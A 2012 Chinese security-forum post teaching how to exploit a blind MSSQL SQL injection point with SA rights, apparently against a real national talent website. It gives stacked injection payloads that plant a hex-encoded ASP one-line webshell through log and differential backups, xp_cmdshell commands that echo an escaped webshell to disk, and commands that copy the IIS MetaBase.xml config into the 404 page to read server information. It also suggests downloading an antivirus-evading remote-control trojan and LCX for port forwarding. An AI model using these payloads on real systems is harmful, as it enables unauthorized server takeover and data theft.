找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2307|回复: 0
打印 上一主题 下一主题

sa权限的教程.

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:30:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————
7 Q2 [" {2 N8 b! |4 z3 R
+ u  o, m) f6 T. R. q3 }3 v( _6 X) w( n, {
                                                             欢迎高手访问指导,欢迎新手朋友交流学习。8 k5 L; r! ~: z' k

2 u; s! ^& z' C4 U6 r9 X, R$ N                                                                 7 Z+ [" `6 e9 j8 f
                                                                 + e2 s, l6 P9 I9 K2 g
                                                                  论坛: http://www.90team.net/& v) d0 l% ^, K! a" \
0 C1 j" J3 e* K& {( K
3 a2 ^& r  w+ D% }6 z/ k- t0 U6 a" j
& b6 X; D& Y: `9 {
友情检测国家人才网
' [# j1 z& N! y+ Q: l
5 ~' G, O- ?' ^7 j; R& t2 Q0 c3 [4 S
3 v' {4 J! T9 H% t9 }, C内容:MSSQL注入SA权限不显错模式下的入侵
1 y, b5 y% w) T, p0 F2 e
6 m- V$ s6 s3 [- W: O
. i! K  r& ]( Z  H+ @一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。0 y, u& A! U1 w3 R+ `$ o

8 g7 Z1 Y& v* k( ]$ J0 r我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。
4 y' L  Z3 [  C* }; L# j0 T0 y- R8 t; N# Z, z8 z! G

: @3 j1 O8 z3 U9 `% ]5 B这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。+ q: V! ~. R; C9 z3 x7 C2 H, h

% M7 A8 A$ E* m  O2 C/ C思路:& j% r+ [' e: Q2 _6 ]# Y; I
$ s6 ~" J: w3 N7 G7 j: y6 G
首先:! ^8 z( V* D7 v3 `& o# [3 }
4 y$ \* `7 i- f/ s4 Z
通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。
/ I) x- M6 g! |! {0 t
$ E* v, l' F2 I% B# v1.日志备份获得Webshell( D3 k7 ?4 _5 i* T. E8 y! W

6 s2 d# q. d% @. }" g2.数据库差异备份获得Webshell
0 P8 p& ]/ F: ^; _
. ?9 C# k5 r+ l) ~5 D0 z$ k4.直接下载免杀远控木马。/ f# q8 w" e5 l5 [" f- [

, U% k$ I( f7 D5.直接下载LCX将服务器端口转发出来
  J; D5 [# J3 t. R+ t" u- n  H7 K& X( l: [0 X- _/ H' O* L
6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。2 p6 J- q8 b4 G

' ~  v2 u$ Q: D5 f$ P
/ q1 i$ c7 K1 i% g& v6 }# `4 {" i) |9 x
在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了,
+ l6 i3 }; x3 h1 h4 [1 {3 Q+ I
- S* A* f1 j0 P  ]( S! Q* U3 f我直接演示后面一个方法* L8 f3 l$ l9 f/ ^4 j$ [
) g6 g  m8 Y& q# U5 i- D
, w8 N' @2 y% S8 m5 c! {  q
分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL
8 I/ y7 ]3 Q0 d1 \! L6 k0 x) V8 a2 u% m5 r: F2 E

; T% \2 F3 Z5 M6 _
7 C/ V) _. V% a4 |- c" j- E. Z2 D  n: I& V+ |5 f% X$ i8 M. X
◆日志备份:$ U; s/ t$ i$ ^% |% y% i" F4 c' l
/ \; q! a6 @! s2 q# s2 L0 q/ T

# x' z1 P6 g& S5 Q  r8 d7 d" W1. 进行初始备份( b6 P8 S. B1 D- u
; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--
7 b% H6 k! a8 @9 M. p8 h6 x$ A" h" I) B3 a2 \
2. 插入数据
) ?1 C1 j. _2 ^4 b( Q;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--' P0 ~$ D. |6 O( H
! X6 S. o. D. v% S" z
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>: Z/ m: ~/ ^4 m2 }+ D1 a5 J# e
  
% ]) A( q& r* ~: l& i3. 备份并获得文件,删除临时表5 ?/ e/ {$ q& D. `4 x9 p
;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--$ o2 b0 \5 |6 f$ m

! ^3 j# \" L- j* g3 c/ A: G
5 N6 ^% |0 C  C1 \8 ?. y1 `7 w) ?$ }) R) S, Y& g8 S
◆数据库差异备份; V, [: R- W( g8 A# p0 B; P* v. R

4 T4 T' C5 z: A( Y) P+ e' g(1. 进行差异备份准备工作
/ o- M4 Q# w* b$ |. ~4 o$ \, }/ A$ c
;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--
/ N0 F; F! d1 F5 n7 K, l! ^4 v: d' B) \8 {$ _9 n( I$ W
上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码
( e4 W8 O  ?# j+ A4 ] $ W0 G$ X# e! s0 ^+ e

6 a- J+ S/ H* ^( |& W(2. 将数据写入到数据库
8 X2 }8 Y% o, N;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
! h, y" m8 }2 o" R
# s  J$ k2 f6 M" X* `4 ?: D0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
% V5 [8 x1 h& g( Z! H, |1 p* F8 Z
3. 备份数据库并清理临时文件
+ ~* `4 A2 k$ w8 W( q4 C  x8 E% p5 [9 i6 S; }
;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--
/ k! a; e) Q7 B9 ?% K3 q5 }  m( W  h7 T- J
0x633A5C746573742E617370  为 c:\test.asp  删除临时文件
( o1 `' \3 ^  _! }4 M1 T- a
. u2 v- i2 A2 ~: n  i. L
9 J5 c, d5 z2 a+ v. M
2 z  h3 U: L) u/ Q/ [8 m用^转义字符来写ASP(一句话木马)文件的方法:   
# N8 V) K( q* j- n' ~
" s# X# S) T$ O3 \* X1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--
' u7 S4 t) k% [  s1 x/ Z4 z6 w4 T8 a
1 X! }1 f) c$ T& n- I2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp 4 K9 j% W+ t  i6 B7 u, M5 m- P

! r- `7 v5 [$ g! Z读取IIS配置信息获取web路径
1 n6 D) g! L: N% A* M. h% Q8 s- T% i3 D3 V  \$ G" K
     " y& A. }2 ^0 Y" y0 p- w
     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--
3 M% w1 O2 B$ }2 r1 B6 F) _
# L6 v; j5 }5 D( H  ]执行命令
7 [6 @+ H7 Q$ P% i0 z  j4 H; c     
5 h9 j' ~  l; ?! L4 v& L$ T' t     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--! m$ I2 F) s# H1 b3 J) S
3 ?+ c3 u; k4 D+ C3 L9 x

6 ?2 r2 B  W  _+ G8 S" A1 c2 q1 O% z( F7 a* J

. k4 B! {2 o1 P9 E, D/ F# S. k5 F' r7 @( X* ]) T3 U" w

) ^! I/ X4 L. @( \
" A# |" L' F) N+ N
( {- o1 E1 c6 ]
3 m, j0 Y6 K$ I2 o- ^7 P5 W
- y1 u( [! Q6 B2 w: _1 V6 v
6 |  z- G  r# U+ _! u% N  @6 r! C" M: r% O/ p  R: n4 W

7 P+ l5 K0 v% X# D+ ?
# e* s0 u+ V. d( x% E% T7 M; Z- c6 K, k+ y

) A# ~" J( D) [0 x1 I/ [: Z0 h+ `6 r! w# M% o! V) }5 ^% E% Q
3 ]& d$ O1 Q8 Q) X1 l
- j2 X) y8 g3 u6 H) r
5 c1 P; S, q/ A% Z3 g6 G
# |- H; W9 g+ Z6 y( L

% U, o- X- o4 S. U, ~3 m+ |' L3 G4 T4 Q5 g6 L
  D' {; O; T2 _$ p) F

# [" S* N* |6 K# O: x* ], j
2 z9 u( g! y# R1 o  s
, s8 j' j  b0 Q' ?& M1 a  R" p0 q9 u
. F. N/ i# }8 H, F) s. q" J

( z3 G4 Y- P4 i# S, ^
1 W& Y/ u+ `. X' ?  ?$ w" ]  R" O! e
' X+ J2 D$ X8 v

3 J$ P1 D# W8 H" g+ S8 G1 H/ D
/ }, m/ {/ z" E* t4 R
; J  h5 v: |5 `, r2 ^3 \9 e* A& S0 ]* m; N

1 E, `) {# p& y, v2 _2 N7 G3 l; ?& z0 E" ~0 m9 `2 X& ]
! _2 {& ^% T% ^: L) h: A

4 q# f1 h- k5 F/ e) l' ]: w2 r2 W- p% ]" N2 m3 ~; U( i6 D4 @* b+ X

/ T; O) r; u6 M* s) Y( c" u
- V2 l# p- @3 b6 j  N/ L. i) w( E2 d$ ^2 r

/ N. K$ i1 [7 y( Q% [- e
4 I6 @$ H" j7 p+ i( `: M' K6 K( ?7 G2 c, z- q. r5 j- t7 f
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表